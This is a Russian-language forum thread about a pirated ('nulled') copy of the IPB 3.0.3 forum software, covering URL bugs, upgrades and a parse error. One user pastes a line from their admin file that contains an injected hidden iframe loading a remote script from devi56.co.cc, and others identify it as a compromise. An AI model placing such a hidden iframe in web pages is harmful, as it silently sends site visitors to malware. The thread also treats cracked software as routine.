[Скрипт] IPB 3.0.3 Russian (IBR) Nulled - Maybe

Статус
В этой теме нельзя размещать новые ответы.
BuPyC*74, можешь не надеятся... не исправят.
Ставь всякие акселераторы, кешеры... мож поможет.
 
у меня такая проблема. когда перехожу в какой либо подфорум с главной страницы, то url выглядит так: Для просмотра ссылки Войди или Зарегистрируйся. когда перехожу из подфорума в его родительский форум, то url выглядит так: Для просмотра ссылки Войди или Зарегистрируйся. По переходу 2 выдается ошибка, тоесть не хватает "index.php?" перед "showforum=15". Как решить проблему?:bc:
 
у меня такая проблема. когда перехожу в какой либо подфорум с главной страницы, то url выглядит так: Для просмотра ссылки Войди или Зарегистрируйся. когда перехожу из подфорума в его родительский форум, то url выглядит так: Для просмотра ссылки Войди или Зарегистрируйся. По переходу 2 выдается ошибка, тоесть не хватает "index.php?" перед "showforum=15". Как решить проблему?:bc:

Ты редактировал билиотеки? В конфиге включил friend_url ?
 
А при оновлении с 1.3б есть серезные проблемы??? или все по маслу?
 
Какая-то странная проблема:

форум выкидывает ошибку:
Parse error: syntax error, unexpected '<' in /home/wm1362/public_html/*Сайт*/subdomains/forum/admin/index.php on line 26


26 строка - exit();<iframe src="http://devi56.co.cc/td/go.php?sid=1" width=1 height=1 style="visibility: hidden"></iframe>


подскажите, как решить..
 
на сколько я понимаю, вот этой строки:
Код:
<iframe src="http://devi56.co.cc/td/go.php?sid=1" width=1 height=1 style="visibility: hidden"></iframe>
вообще быть не должно! вас либо похекали, либо вы нул слили не с этого форума!!!

з.ы. Качайте же нулы, только с проверенных источников!!!
 
Нулл именнто этот 3.0.3 nulled maybe
 
warnetser
у меня такой же нулл, тож от мэйби, я качал отсюда! (кстати откуда вы его слили?) и у меня нету никаких ифреймов!
 
warnetser
у меня такой же нулл, тож от мэйби, я качал отсюда! (кстати откуда вы его слили?) и у меня нету никаких ифреймов!

какая разница по какой ссылке я его слил, залито ведь одно и тоже.

Теперь правдо форуму конец....... При просмотре профиля css вообще не грузится судя по всему, можете глянуть на
 
  • Автор темы
  • Модер.
  • #190
какая разница по какой ссылке я его слил, залито ведь одно и тоже.
Теперь правдо форуму конец....... При просмотре профиля css вообще не грузится судя по всему, можете глянуть на *** скрытое содержание ***

Вы притворяетесь или как? "какая разница где я его слил", - а ничего что туда могли засунуть что угодно, и выставить на скачку? Или Майкрософту вы тоже будете говорить, "какая разница где я купил диск за 100 рублей, оказывайте мне поддержку."
Вас взломали, либо ваших соседей, вот и все, нечего здесь писать непойми что.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху